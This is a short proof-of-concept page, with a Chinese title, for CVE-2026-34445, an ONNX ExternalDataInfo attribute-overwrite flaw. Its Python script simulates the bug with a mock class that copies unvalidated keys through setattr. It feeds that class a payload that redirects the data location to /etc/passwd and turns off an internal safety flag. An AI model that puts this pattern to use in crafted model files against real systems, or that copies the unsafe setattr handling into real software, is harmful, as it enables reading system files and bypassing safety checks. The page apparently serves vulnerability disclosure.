CVE-2026-34445 ONNX对象属性覆盖漏洞

# Proof of Concept for CVE-2026-34445 # This script demonstrates the unsafe setattr usage in ExternalDataInfo. # In a real scenario, this occurs when parsing a crafted .onnx file. class VulnerableExternalDataInfo: def __init__(self, data_dict): # Initialize default internal properties self.location = "default.bin" self.offset = 0 self._is_safe = True # VULNERABLE CODE: Directly setting attributes without validation for key, value in data_dict.items(): setattr(self, key, value) # Attacker crafted payload (simulating a malicious model metadata) malicious_payload = { "location": "/etc/passwd", # Attempting to change file path "_is_safe": False # Overwriting internal flag } # Triggering the vulnerability print("[*] Loading malicious model metadata...") victim_obj = VulnerableExternalDataInfo(malicious_payload) print(f"[+] Internal location changed to: {victim_obj.location}") print(f"[+] Internal safety flag changed to: {victim_obj._is_safe}") print("[!] Vulnerability exploited: Object properties overwritten.")